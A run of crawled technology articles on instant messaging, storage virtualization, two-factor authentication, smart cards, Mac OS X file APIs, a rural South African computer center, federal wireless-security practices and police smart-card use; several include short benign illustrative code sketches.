IM is an Internet technology that lets you send and receive text messages, voice messages, file attachments, and other data instantly over the Internet. E-mail is not an instant technology because it sends messages through a server that stores the items until the user retrieves them. Messages arrive in real time using IM because both parties are constantly connected to the network. When you log on to an IM service, the software informs a server that you are online and ready to receive messages. In order to send messages to another user, you select that person's name from a contact list you've built. You then enter your message and click Send. Depending on which service you use, the server either directly relays the message to the recipient or facilitates a direct connection between you and the recipient. There are three methods that IM services use to deliver messages: centralized network, peer-to-peer connection, or a combination of both:
- Centralized network--Connects users to each other through a series of servers that form a large network. When a message is sent, servers find the recipient's PC and route the message through the network until it reaches its destination. MSN Messenger uses this method.
- Peer-to-peer--Uses a central server to keep track of who is online. Once you log on, the server sends you the IP addresses of everyone on your contact list who is currently logged on. By doing this, messages are sent directly to the recipient without involving a server. This method is faster for sending large files and graphics. ICQ uses this method.
- Combination--Uses a centralized network of servers for sending text messages, but establishes a peer-to-peer connection for sending large files and graphics. AIM uses this method.
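To illustrate the centralized-network model in miniature, here is a hypothetical Python sketch of a relay server: clients announce a name on connect (which is how the server knows who is online), and messages addressed as "recipient:text" are routed through the server to the recipient's socket. The framing and error handling are deliberately naive; a real IM service would also need authentication, message queuing, and presence notifications.
import socket, threading

clients = {}  # screen name -> connected socket (the server's presence table)

def handle(conn):
    name = conn.recv(1024).decode().strip()      # first message: sign-on name
    clients[name] = conn
    try:
        while True:
            data = conn.recv(4096)               # naive: assumes one recv = one message
            if not data:
                break
            to, _, text = data.decode().partition(":")
            if to in clients:                    # relay through the central server
                clients[to].sendall(f"{name}: {text}".encode())
    finally:
        clients.pop(name, None)
        conn.close()

srv = socket.socket()
srv.bind(("0.0.0.0", 5050))
srv.listen()
while True:
    conn, _ = srv.accept()
    threading.Thread(target=handle, args=(conn,), daemon=True).start()
A peer-to-peer service would use the same presence table but hand out each contact's IP address instead of relaying the payload, trading server load for a direct (and faster) bulk-transfer path.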
<urn:uuid:76aa0221-9b80-4453-9596-25e79a627eb8>
CC-MAIN-2017-04
http://www.enterprisenetworkingplanet.com/netsysm/article.php/624591/Using-Instant-Messaging-as-a-Support-Resource.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00482-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918337
450
2.78125
3
The problem is that trying to predict future storage use on an application-by-application basis is likely to be doomed to failure and leave a lot of unutilized space. For example, let’s say that Application A “rented” a two-bedroom storage “apartment” but only used one bedroom. That leaves a lot of wasted space. On the other hand, Application B is running out of space in the one-bedroom storage apartment it once thought was more than big enough. Reprovisioning in a typical storage environment is hard. Using an approach called “thin provisioning,” the storage hypervisor offers applications virtual storage “apartments” that provide as much storage as they want – within reason and as long as the overall physical storage is not exceeded. Note that an analogous process occurs with virtual machines on a physical server. The storage hypervisor also decouples storage services from underlying physical media, i.e. disks. What does that mean? A SAN storage system derives its value from both its associated hardware and software. The hardware provides both higher availability – such as no single point of failure – and performance – such as the use of a sophisticated controller cache – to provide differentiation from, say, JBODs. The software provides added value in what are called storage services, such as remote mirroring or replication capabilities, and various forms of snapshots. These capabilities are essential for many tasks, including such data-protection activities as local backup and remote disaster recovery. However, these capabilities are traditionally associated with physical media, such as particular disk LUNs (logical unit numbers). When an application needs to add LUNs or change existing LUNs, the process may not be easy. A storage hypervisor essentially changes the paradigm to data-centric storage services – designed to meet the often rapidly changing requirements of applications/information – rather than media-centric storage services – limited to the characteristics of physical disks, tapes and arrays. That means that in hypervisor-enabled environments, storage services accompany the data and data can easily be moved virtually from one physical instantiation to another. Moreover, it is easier to apply different storage services to different sets of application data; for example, mission-critical data requires greater high availability (HA) requirements for processes such as remote mirroring, as contrasted to year-old e-mails that have to be safely preserved for e-Discovery purposes, but do not have to be instantly retrievable. It should be obvious that life for an administrator utilizing the storage hypervisor schema can be devoted to more value-added tasks since a combination of IBM SVC makes storage virtualization happen, and IBM TPC makes not only managing changes themselves, but also managing at a more granular level, significantly easier. That IBM’s management process can address data on virtual volumes across multiple tiers of storage – including tier 0 SSD flash memory, tier 1 FC/SAS, and tier 2 SATA – across disparate storage systems – such as IBM XIV and DS8300 systems, but also with storage arrays from another vendor – and from site-to-site – with probably some reasonable limitation on distance – is the icing on the cake. Although no cloud is required, a storage hypervisor sounds like an essential good mix-and-stir ingredient for a private, public or hybrid cloud. 
At IBM Pulse 2012, IBM customer Ricoh testified to the benefits, such as cost savings, it had garnered by using IBM-originated storage hypervisor products. That is the type of benefit most customers strive for, but IBM likes to use an example that makes data mobility without disruption – i.e., no downtime for applications and their data – even more dramatic than migrating data from one array to another during a technology refresh. Let's say that you have one site in the impending path of a major hurricane and another site situated safely outside the potential path of destruction. Let's say that you have a server hypervisor (such as VMware vSphere for Intel servers or IBM PowerVM for Power servers) and the IBM storage hypervisor platform. With an IBM SVC stretched cluster – part of the IBM storage hypervisor in which SVC supports servers and storage at two geographically separate sites – the same data can be accessed at each site, and a VMware vMotion or IBM PowerVM Live Partition Mobility (LPM) move can be performed non-disruptively to end users. Can your sites do that?

But wait, there's more. In moving to a cloud, a services catalog is essential so that users can easily select the services they need – that is what IT-as-a-service is all about. The implementation of a storage hypervisor enables the development of a storage services catalog. IBM believes that each company has roughly 15 different data types – such as e-mail, database, word processing documents and video – each of which requires distinctive service levels across four dimensions: capacity efficiency, I/O performance, data access resilience and disaster protection.
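A storage services catalog can be thought of as a mapping from data types to service levels along those four dimensions. The sketch below is purely illustrative: the data types and dimension names come from the article, while every service-level value is an invented example.

```python
# Illustrative storage services catalog; all service-level values are made up.
CATALOG = {
    "e-mail (year-old archive)": {
        "capacity_efficiency": "high (deduplication, compression)",
        "io_performance": "tier 2 SATA is sufficient",
        "data_access_resilience": "standard",
        "disaster_protection": "nightly replication",
    },
    "database (mission-critical)": {
        "capacity_efficiency": "low priority",
        "io_performance": "tier 0 SSD / tier 1 FC-SAS",
        "data_access_resilience": "high availability, no single point of failure",
        "disaster_protection": "synchronous remote mirroring",
    },
}

def service_levels(data_type):
    """Look up the service levels a new volume of this data type should receive."""
    return CATALOG[data_type]

print(service_levels("database (mission-critical)")["disaster_protection"])
```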
<urn:uuid:493ad47d-a614-4305-9010-98c1ee6fde5a>
CC-MAIN-2017-04
http://www.networkcomputing.com/storage/ibm-pulse-2012-new-storage-hypervisor/382094494/page/0/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00390-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948631
1,036
2.859375
3
First, let's cover the basics. Two-factor authentication (2FA) is where a user's credentials are made up of two independent factors, such as:

- Something you know (PIN, simple password, alpha-numeric password, alpha-numeric password with special characters, secret questions, passphrase);
- Something you have (keyfob token, key, debit card, smartcard, mobile phone); or
- Something you are (biometric data, such as fingerprint, retina, iris, face, veins, DNA, voiceprint, hand, typical usage patterns).

Admittedly, this is elementary information that many of you reading this already know. Nevertheless, defining the concept from the outset serves to reinforce your previous education. The tried and tested combination used by countless organizations is the hardware keyfob token (something you have) and a secret PIN (something you know). One type is the one-time password (OTP) keyfob, which is typically carried on your key ring and displays a pseudo-random number that changes periodically. The keyfob itself contains an algorithm (driven by a clock or a counter) and a 'seed record' used to calculate the pseudo-random number. The user enters this number to prove that they have the token. The server that is authenticating the user must also have a copy of each keyfob's seed record, the algorithm used, and the correct time.

This technology – widely used to secure remote access to corporate networks and data – is nothing new; many of us have been carrying hardware tokens around in our pockets for at least the last 25 years. Back in 1986, mobile phones were the size of briefcases and anything but smart. But technology has moved on, so isn't it about time to kill off the hardware token? In recent years, authentication vendors have been looking for alternatives: sometimes in response to increasing pressure on costs, but also to increase convenience for the end users of the token devices. Because most enterprise users of 2FA have a smartphone, it would make sense to try to exploit it as one of the factors. "Since we first published our 2009 report on the market for mobile device-based authentication, we have seen a steady rise in the adoption of mobile devices as two-factor authenticators", says industry expert Alan Goode, founder and managing director of Goode Intelligence. "We estimate that, today, it probably accounts for over 20% of total 2FA sales."

Are Software Tokens the Answer?

A software version of the OTP keyfob for smartphones has been available for nearly as long as the concept of the smartphone – remember the Ericsson R380, released in 2000? Me neither, but you could install an RSA Security software token on it to generate an OTP. This is exactly the same technology as the hardware version. However, instead of carrying around an extra piece of hardware, it uses the smartphone to calculate the OTP from the 'seed record', along with the smartphone's clock and the algorithm contained in software installed on the device, usually in the form of an app. Despite software tokens having been available for more than a decade, it's only in recent years that we've seen organizations starting to replace traditional hardware tokens with software versions. The driving force behind the switch is that most people now have a smartphone in their pocket capable of running apps. Software tokens do have some significant advantages over their hardware-based counterparts – for both organizations and end users. For example, you can't lose a software-based token, feed it to the dog, or put it through the wash.
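As an aside, the seed-plus-clock scheme described above is, in spirit, what the open TOTP standard (RFC 6238) later codified. The sketch below uses only the Python standard library; it is illustrative, not the proprietary algorithm inside any particular vendor's token, and the sample seed is invented.

```python
import hashlib
import hmac
import struct
import time

def totp(seed, at=None, step=30, digits=6):
    """Time-based one-time password in the style of RFC 6238 (HMAC-SHA1)."""
    counter = int((time.time() if at is None else at) // step)  # the "clock"
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                     # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

seed = b"per-token-secret-seed"   # the seed record, shared with the server
print(totp(seed))                 # what the token would display right now
print(totp(seed) == totp(seed))   # the server recomputes and compares: True
```

Both sides derive the same pseudo-random number because both hold the seed and agree on the time, which is exactly why the server must also have a copy of each keyfob's seed record, the algorithm used, and the correct time.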
OK, perhaps you can still lose a smartphone, feed it to the dog, or put it through the wash, but then it's just a case of re-provisioning the app. Also, for geographically dispersed organizations, software tokens can be sent electronically – no waiting for shipping or battling with reams of customs paperwork just to get a token to the other side of the world.

There's an App for That!

The explosion in apps for business use presents a problem for authentication when using a token app on the same device. If you're using apps on your smartphone to access corporate data and rely on another app on the same device to be the 'something you have', is that really two-factor authentication? What if you've left your smartphone on the plane, having removed the password so you could watch a movie? You're now down to just a single factor to gain access to confidential data, and probably regretting setting the other factor – the 'something you know' – to '1234' so you could type it easily.

Technology could be the answer to this unfortunate scenario. Earlier I discussed software-based tokens on mobile devices, but this just transports last century's technology to the smartphone. New solutions are now coming to market that don't rely on 'something you have', but can still utilize these mobile devices. "Our research tells us technology vendors are embracing the smartphone to develop new innovative ways to leverage its characteristics for authentication purposes", says analyst Alan Goode. "Some of these technologies are at an emerging stage and we don't expect them to be deployed in large numbers in the short term, but they give us an indication of the direction the authentication market will go: smart, agile, flexible solutions that will create strong authentication services that can be embraced by the many, not the privileged."

One evolving area involves employing biometrics on smartphones to authenticate users based on physical attributes or behaviors. This moves the second factor to 'something you are' or 'something about your behavior'. Biometric authentication on smartphones is still in its infancy, but several vendors are coming up with potential solutions. When we think of biometrics, most of us think of fingerprints. Most smartphones don't come with a built-in fingerprint reader, but some companies produce clever iPhone cases that incorporate fingerprint readers, such as the Tactivo iPhone case. Until these capabilities are built into the phones themselves, however, they are unlikely to take off, due to cost and the added inconvenience of using and managing the extra hardware involved. One biometric that has the potential to work across all types of smartphones is voice, which uses the device's microphone to capture biometric information. Everyone has a voiceprint that allows them to be uniquely identified, and the simplicity of authenticating with just the characteristics of your voice is very appealing. Vendors, including Nuance – the technical brains behind the iPhone's Siri voice recognition – are beginning to offer toolkits (DragonID) that allow app vendors to incorporate this technology into their applications.

All About Risk

What about a technology that could authenticate you silently in the background, and provide a similar level of assurance that you are who you say you are? This is where risk-based, or contextual, authentication comes into play. This technology observes user behavior – how often users authenticate, from where in the world, and from what device – to calculate a risk score each time (a toy sketch of the idea follows).
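As a back-of-the-envelope illustration of such a risk score, consider the hypothetical sketch below. The factors, weights and threshold are all invented; commercial products use far richer models.

```python
# Hypothetical contextual-authentication scoring; all weights are invented.
def risk_score(request, profile):
    score = 0
    if request["country"] not in profile["usual_countries"]:
        score += 50                          # unfamiliar location
    if request["device_id"] not in profile["known_devices"]:
        score += 30                          # unfamiliar device
    if request["hour"] not in profile["usual_hours"]:
        score += 20                          # unusual time of day
    return score

def decide(request, profile, threshold=40):
    if risk_score(request, profile) <= threshold:
        return "allow with username and password"
    return "step up: send an OTP to the user's phone"

profile = {"usual_countries": {"GB"}, "known_devices": {"laptop-1"},
           "usual_hours": set(range(18, 23))}
# The London-vs-China scenario described in the next paragraph:
print(decide({"country": "CN", "device_id": "laptop-1", "hour": 20}, profile))
```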
This combination of multiple factors is very powerful in assessing a user's identity, and the smartphone is the perfect device to capture the information required. Most have a GPS receiver built in, so they know where you are at all times. "The context of a user's access request is important when considering risk-based analysis", explains Bob Tarzey, analyst and director at Quocirca. "Using advanced security intelligence correlations, an access request can be checked against what is going on elsewhere or has gone on recently. A risk score is given based on how much deviation from a normal authentication session there is."

If the score generated when a user tries to gain access to their information is within the acceptable level, then the user will be allowed to authenticate with the standard username and password. However, if a user who normally logs in from home each evening in London is suddenly asking to log in from China on a Sunday evening, then they will generate a higher score. This higher score would either deny the user access or trigger some other method of authentication, such as an OTP sent to the user's phone.

Securing the App

There are significant barriers to the adoption of both biometrics and risk-based authentication technologies on smartphones. Both require that the apps and smartphones have these technologies integrated. This can work when vendors produce integration kits for app developers, and the app developers see the business case for a higher level of security; but this is going to seriously limit the apps that you can allow your users to run. Do you want to be the one who tells the CEO he can't use the amazing new mind-mapping app he's been showing off to everyone because it doesn't support your authentication technology? No, me neither. The age of Bring Your Own Apps is here – and it's going to be even more difficult to avoid than Bring Your Own Device.

The Token is Dead – Long Live the Token!

There's no doubt that the use of two-factor authentication is expanding and that we rely on smartphones as business tools to get access to sensitive data. While the increased convenience and decreased cost of using the smartphone as a replacement for hardware tokens make it a valid approach, unless we move away from the traditional 'something you have' factor, we're increasing the risk of our data being compromised. Less security and a cheaper solution might be the right thing for some organizations or users, and that's fine as long as we acknowledge the risks. However, having explored some of the alternatives that vendors are proposing – including software tokens, biometrics and risk-based authentication – there is no clear winner for exploiting the smartphone as a factor in the authentication experience. Maybe that's why the hardware token is still going strong. It doesn't require app developers to rewrite their apps from scratch, and the hard token provides us with the level of security assurance we want and need. We've been carrying tokens around for 25 years; I wonder if they'll make 50?

Authentication expert Grant Le Brun heads up the research labs at Signify, an authentication services vendor that provides a range of 2FA hosted services. Under his direction, the labs provide clear, independent knowledge and expertise of authentication and other related technologies. Prior to this, Le Brun was a systems engineer at Signify and, before that, a technical consultant for Cambridge Assessment, which owns and manages Cambridge University's three exam boards.
<urn:uuid:b50e4adb-26a0-4e27-ae35-5952b3673263>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/magazine-features/hard-soft-or-smart-evaluating-the-two-factor/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00390-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931988
2,225
2.890625
3
The smart card is one of the latest additions to the world of information technology. Similar in size to today's plastic payment card, the smart card has a microprocessor or memory chip embedded in it that, when coupled with a reader, has the processing power to serve many different applications. As an access-control device, smart cards make personal and business data available only to the appropriate users. Another application provides users with the ability to make a purchase or exchange value. Smart cards provide data portability, security and convenience.

Memory vs. microprocessor

Smart cards come in two varieties: memory and microprocessor. Memory cards simply store data and can be viewed as a small floppy disk with optional security. A microprocessor card, on the other hand, can add, delete and manipulate information in its memory on the card. Similar to a miniature computer, a microprocessor card has an input/output port, an operating system and a "hard disk", with built-in security features.

Contact vs. contactless

Smart cards have two different types of interfaces: contact and contactless. Contact smart cards are inserted into a smart card reader, making physical contact with the reader. However, contactless smart cards have an antenna embedded inside the card that enables communication with the reader without physical contact. A combi card combines the two features with a very high level of security.
<urn:uuid:3d335fc0-20df-4348-a22b-a1a8e3a30ec5>
CC-MAIN-2017-04
http://www.gemalto.com/companyinfo/smart-cards-basics/what
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00539-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915644
269
3.28125
3
Mac OS X has historically supported many different ways of referring to files on disk from within an application. Plain-old paths (e.g., /Users/john/Documents/myfile) are supported at the lowest levels of the operating system. They're simple, predictable, but perhaps not such a great idea to use as the only way an application tracks files. Consider what happens if an application opens a file based on a path string, then the user moves that file somewhere else while it's still being edited. When the application is instructed to save the file, if it only has the file path to work with, it will end up creating a new file in the old location, which is almost certainly not what the user wanted.

Classic Mac OS had a more sophisticated internal representation of files that enabled it to track files independent of their actual locations on disk. This was done with the help of the unique file ids supported by HFS/HFS+. The Mac OS X incarnation of this concept is the FSRef data type. Finally, in the modern age, URLs have become the de facto representation for files that may be located somewhere other than the local machine. URLs can also refer to local files, but in that case they have all the same disadvantages as file paths.

This diversity of data types is reflected in Mac OS X's file system APIs. Some functions take file paths as arguments, some expect opaque references to files, and still others work only with URLs. Programs that use these APIs often spend a lot of their time converting file references from one representation to another. The situation is similar when it comes to getting information about files. There are a huge number of file system metadata retrieval functions at all levels of the operating system, and no single one of them is comprehensive. To get all available information about a file on disk requires making several separate calls, each of which may expect a different type of file reference as an argument. Here's an example Apple provided at WWDC. Opening a single file in the Leopard version of the Preview image viewer application results in:

- Four conversions of an FSRef to a file path
- Ten conversions of a file path to an FSRef
- Twenty-five calls to getattrlist()
- Eight calls to stat()/lstat()
- Four calls to open()/close()

In Snow Leopard, Apple has created a new, unified, comprehensive set of file system APIs built around a single data type: URLs. But these are URL "objects"—namely, the opaque data types NSURL and CFURL, with a toll-free bridge between them—that have been imbued with all the desirable attributes of an FSRef. Apple settled on these data types because their opaque nature allowed this kind of enhancement, and because there are so many existing APIs that use them. URLs are also the most future-proof of all the choices, with the scheme portion providing nearly unlimited flexibility for new data types and access mechanisms. The new file system APIs built around these opaque URL types support caching and metadata prefetching for a further performance boost. There's also a new on-disk representation called a Bookmark (not to be confused with a browser bookmark) which is like a more network-savvy replacement for classic Mac OS aliases. Bookmarks are the most robust way to create a reference to a file from within another file. It's also possible to attach arbitrary metadata to each Bookmark.
For example, if an application wants to keep a persistent list of "favorite" files plus some application-specific information about them, and it wants to be resilient to any movement of these files behind its back, Bookmarks are the best tool for the job. I mention all of this not because I expect file system APIs to be all that interesting to people without my particular fascination with this part of the operating system, but because, like Core Text before it, it's an indication of exactly how young Mac OS X really is as a platform. Even after seven major releases, Mac OS X is still struggling to move out from the shadow of its three ancestors: NeXTSTEP, classic Mac OS, and BSD Unix. Or perhaps it just goes to show how ruthlessly Apple's core OS team is driven to replace old and crusty APIs and data types with new, more modern versions. It will be a long time before the benefits of these changes trickle down (or is it up?) to end-users in the form of Mac applications that are written or modified to use these new APIs. Most well-written Mac applications already exhibit most of the desirable behavior. For example, the TextEdit application in Leopard will correctly detect when a file it's working on has moved. Of course, the key modifier here is "well-written." Simplifying the file system APIs means that more developers will be willing to expend the effort—now greatly reduced—to provide such user-friendly behaviors. The accompanying performance boost is just icing on the cake, and one more reason that developers might choose to alter their existing, working application to use these new APIs.
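To see why identity-based tracking beats path-based tracking, consider the rough sketch below. It has nothing to do with the actual NSURL/Bookmark implementation; it merely demonstrates the underlying idea using POSIX (device, inode) pairs, and its brute-force rescan is precisely the inefficiency that real FSRef/Bookmark machinery is engineered to avoid.

```python
import os

class TrackedFile:
    """Track a file by identity rather than by path (illustrative only)."""
    def __init__(self, path):
        st = os.stat(path)
        self.identity = (st.st_dev, st.st_ino)  # survives a same-volume rename
        self.last_known_path = path

    def resolve(self, search_dir):
        """Re-find the file under search_dir even if the user moved it."""
        for root, _, names in os.walk(search_dir):
            for name in names:
                candidate = os.path.join(root, name)
                try:
                    st = os.stat(candidate)
                except OSError:
                    continue
                if (st.st_dev, st.st_ino) == self.identity:
                    self.last_known_path = candidate
                    return candidate
        return None  # deleted, or moved outside search_dir
```

An application saving through such a reference would follow the file to its new location instead of recreating it at the stale path.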
<urn:uuid:16183228-637a-4c3c-b606-38bd97a7f633>
CC-MAIN-2017-04
http://arstechnica.com/apple/2009/08/mac-os-x-10-6/7/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00317-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943579
1,037
2.90625
3
The people of Kgautswane unite to put their land on the technology map.

By Cianran Ryan

Kgautswane, in South Africa's Northern Province, is described as "deep rural." That means it lies beyond the reach of the national electricity and telephone grids, sufficiently remote to place it out of radar range for regional development planners. The electricity grid passes nearby en route to more substantial towns to the north, but Kgautswane is unlikely to have electricity for several years because the state-owned electricity utility considers it a low-priority village. Its community center comprises a dozen 20-foot steel transport containers strung together into a network of rooms and offices. Kgautswane residents have modest expectations of life. The village and its surrounds support a population of about 60,000, most of them subsistence farmers. As in many rural villages in South Africa, a high percentage of able-bodied men and women are forced to seek work elsewhere -- in cities such as Johannesburg or Pretoria, several hundred miles away, or in Lydenburg, the nearest major town, about 50 miles distant. Children are often raised by the grandparents or extended family members who remain behind and rely on financial support from those who leave to seek work elsewhere. The area is well-served by schools. There are some 10 primary- and seven secondary-level schools -- one of these, lying sufficiently close to the grid, has electricity. The rest rely on daylight and candles. Given such handicaps, the people of Kgautswane have learned to be self-reliant. Several years ago, they formed the Integrated Community Building (ICB) program to conceive and implement projects aimed at community improvement. Led by Clara Masinga, the ICB has achieved some commendable successes, one of which is the Kgautswane Information Communication and Technology (ICT) Center, a seemingly modest project comprising no more than an IBM server, three workstations, two uninterruptible power supplies and a color printer/scanner. Power is supplied from a 5,500-watt gas-fuelled generator, which runs 18 hours a day -- such is the demand for the service. There is insufficient juice from the generator to power light bulbs, so visitors are treated to the incongruous spectacle of high-tech computers being operated by candlelight after dark. Another $15,000 would allow the center to purchase a solar-power system capable of switching on electric lights. The center is owned and run by the ICB, with generator fuel paid for by renting the computers to locals who use them to lend a professional touch to business plans or school reports. The center generates income of about $800 a month, but this will increase as new workstations are added. The total cost of the project, including training, was about $44,000. This was partly funded by the World Bank, but similar centers elsewhere in southern Africa were funded by selling naming rights to corporate sponsors. Paul West, director of the Centre for Lifelong Learning at Technikon South Africa, one of the sponsors of the project, says the center is changing life for Kgautswane residents in other ways. "For one, levels of computer literacy have been markedly raised. Most people in Africa will never own a computer in their lifetimes. Therefore, other ways will have to be found to introduce them to the information society. This project is introducing the people of Kgautswane to the information society and bridging the digital divide.
"The center has been used more than we initially expected, and as a result there is pressure to add more PCs. The existing level of literacy in Kgautswane underlines the capacity of rural people to accept high-tech solutions and integrate them into their lifestyles." Since the launch of the Kgautswane ICT Center in 1999, the village has become a font of entrepreneurial energy. Typed business plans pour out of the center in search of finance and partners. Teachers are issuing students with professionally presented rather than hand-written papers and committee minutes are now committed to print. Kgautswane has had a crash course in the joys of computing. Eyes on a Prize Such a facility would scarcely raise an eyebrow in developed countries, but it so impressed the Stockholm Challenge judges, which included Government Technology Editor Wayne Hanson, that they decided to make this joint winner in its "Equal Access" category, alongside another South African entry, the Manguzi Wireless Internet project. West says the judges were impressed with the determination of the project coordinators to succeed against all the odds -- no power, telephones, funds or trained personnel. The voltage from the generator fluctuates wildly, making this a tricky undertaking for any supplier: "There are few computer companies willing to take on these kinds of risks," says West. Once the telephone lines reach Kgautswane over the next few years, the center will be able to offer an Internet connection and so broaden the universe of opportunities. There is a rudimentary radio telephone link in Kgautswane, but its poor quality does not permit Internet access. Once the center has a single landline, it will be able to erect a satellite broadcast Internet connection, with outgoing requests for Internet information transmitted by landline and information returned by satellite broadcast, the same method used by the Manguzi Wireless Internet project. West is the driving force behind the creation and maintenance of AfricaEducation.org, a large and growing resource for African students and educators intended to help them bridge the educational divide between Africa and developed countries. This facility will be available to Kgautswane residents once the telephone lines reach here. Another resource operated by West and the Centre for Lifelong Learning is the African Digital Library which, through a tie-up with NetLibrary.com, offers African students access to a digital library of some 7,700 books. West managed to put this site together with $250,000 in corporate sponsorships, and says additional funds are needed to expand the library, which operates much like a corporeal one: Only one person can access a title online at a time and must "return" it before anyone else can read it. The online version has the advantage of a full text search capability. The purpose is not to provide students with a casual online read, but to facilitate research, says West. Similar projects are under way in three other towns in South Africa: Pietersburg, in the north, East London on the eastern seaboard, and Nkomazi, toward the Mozambican border. These towns have the advantage of telephone links, making it possible to offer computer services along with a business center and telephones. Telephone penetration rates in South Africa, at about 15 percent, are high by African standards -- yet most people still rely on public telephones. This need has given rise to telephone shops, where banks of phones are available for public use. 
West says the telephone shop is a proven business concept in South Africa, which he is now expanding into a business and computer center. "This has tremendous possibilities throughout Africa. I think we have shown how it is possible to bring computers to the most remote corners of the continent and raise levels of computer literacy," says West.
<urn:uuid:2ad0bf16-af0f-4ef9-818f-edba58688c72>
CC-MAIN-2017-04
http://www.govtech.com/magazines/gt/Computer-Center-Lets-Impoverished-Village-Take.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00317-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959122
1,493
2.765625
3
8 Best Ways to Secure Wireless Technology

GAO: Agencies Inconsistent on Ways They Secure Wireless Assets

"Until agencies take steps to better implement these leading practices, and OMB takes steps to improve governmentwide oversight, wireless networks will remain at an increased vulnerability to attack," GAO Director of Information Security Issues Gregory Wilshusen and Chief Technologist Nabajyoti Barkakati wrote in the 50-page report. To help agencies secure their wireless networks and technologies, GAO came up with eight leading practices:

- Develop comprehensive security policies that govern the implementation and use of wireless networks and mobile devices, implement secure encryption with enterprise authentication, establish usage restrictions and implementation guidance for wireless access and enforce access controls for connection of mobile devices.
- Employ a risk-based approach for wireless deployment.
- Use a centralized wireless management structure that is integrated with the existing wired network.
- Establish configuration requirements for wireless networks and devices in accordance with the developed security policies and requirements.
- Incorporate wireless and mobile device security components in training.
- Use a virtual private network to facilitate the secure transfer of sensitive data during remote access.
- Deploy continuous monitoring procedures for detecting rogue access points and clients using a risk-based approach.
- Perform regular security assessments to help ensure wireless networks are operating securely.

"Many of these practices are consistent with the key information security controls required for an effective information security program ... and reflect wireless-specific aspects of those controls," Wilshusen and Barkakati wrote in the report, which was requested by the chairs and ranking members of the Senate and House Appropriations Subcommittees on Financial Services and General Government. GAO said the approach to securing wireless technologies is inconsistent among the agencies for most of the following leading practices:

- Most agencies developed policies to support federal guidelines and leading practices, but gaps existed, particularly with respect to dual-connected laptops and mobile devices taken on international travel.
- All agencies required a risk-based approach for management of wireless technologies.
- Many agencies used a decentralized structure for management of wireless, limiting the standardization that centralized management can provide.
- Five agencies where GAO performed detailed testing generally configured wireless access points securely but had numerous weaknesses in laptop and smartphone configurations.
- Most agencies were missing key elements related to wireless security in their security awareness training.
- Twenty agencies required encryption, and eight of these agencies specified that a virtual private network must be used; four agencies did not require encryption for remote access.
- Many agencies had insufficient practices for monitoring or conducting security assessments of their wireless networks.

In preparation of the report, GAO reviewed publications, guidance and other documentation, and interviewed subject matter experts in wireless security.
GAO also analyzed policies and plans and interviewed agency officials on wireless security at 24 major federal agencies, and conducted additional detailed testing at five of them: the Departments of Agriculture, Commerce, Transportation and Veterans Affairs, and the Social Security Administration. Responding to the report, Commerce Secretary Gary Locke said he concurred with GAO's recommendations to instruct the National Institute of Standards and Technology, a Commerce Department agency, to develop and issue guidance on:

- Technical steps agencies can take to mitigate the risk of dual-connected laptops;
- Government-wide secure configurations for wireless functionality on laptops and for BlackBerry smartphones;
- Appropriate ways agencies can centralize their management of wireless technologies based on business needs; and
- Criteria for the selection of tools, recommendations on appropriate frequencies of wireless security assessments, and recommendations for when continuous monitoring of wireless networks may be appropriate.
<urn:uuid:283b049f-3eae-4975-b243-f5704c4f4559>
CC-MAIN-2017-04
http://www.inforisktoday.com/8-best-ways-to-secure-wireless-technology-a-3137/op-1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00317-ip-10-171-10-70.ec2.internal.warc.gz
en
0.90621
731
2.5625
3
and mobile data terminals. Police officers and other staff will use multi-application smart cards and key-fob tokens along with desktop digital-certificate-management software to keep departmental communications, files and computer systems secure. At the police department's headquarters, more than 25 officers will use the key-fob tokens to log onto their workstations and authenticate themselves on the department's network. Users must identify themselves with two unique factors - something they know, a PIN, and something they have, the authenticating token - before they are granted access to confidential network resources.

The police department is also deploying multi-application smart cards to officers in the field. Each officer's digital identity is stored on a smart card, which will allow the officers to authenticate their identity before accessing the Federal Bureau of Investigation's National Crime Information Center criminal database from a mobile data terminal. The smart cards also protect digital credentials used to encrypt local files, secure Web and e-mail sessions and regulate access to buildings.

On the desktop side, police department personnel will test security features enabled by a sophisticated public key infrastructure. The desktop security tool supports several flexible methods of file encryption that are easy to use and fully integrated into the operating system via Windows Explorer. Desktop-protected folders will give users the ability to transparently encrypt files by moving them into a protected folder. The tool makes it simpler for officers to encrypt files on the mobile data terminal and securely transmit sensitive information to and from the terminal in a squad car. The police department is contracting with RSA Security to test the security tools.

A View from Above

Florida International University beefed up its TerraFly service. TerraFly, which debuted last November, is one of the largest publicly accessible databases on the Web. Users can visit the TerraFly Web site to see an overhead view of virtually any location in the United States based on images collected by the U.S. Geological Survey and other sources. The university's goal is to make mapping data available for the entire world within five years, and university officials anticipate that TerraFly will ultimately manage more than 20 terabytes of data. The university will also work with a diverse group of industries that want to use TerraFly, and officials estimate TerraFly will generate up to $1 billion in annual revenue for the university.

TerraFly's data-integration capacities will allow an industry to customize GIS data with graphic overlays that contain information specific to that industry. Realtors could overlay information about property values, neighborhood demographics and proximity of shops and schools, producing a comprehensive visual database tailored to the needs of their home-shopping clientele. The university will use IBM's DB2 database software running on Linux to power the High Performance Database Research Center.
<urn:uuid:b9633d62-cf53-4f7b-895e-6ac5282aa7eb>
CC-MAIN-2017-04
http://www.govtech.com/e-government/99405789.html?page=2
null
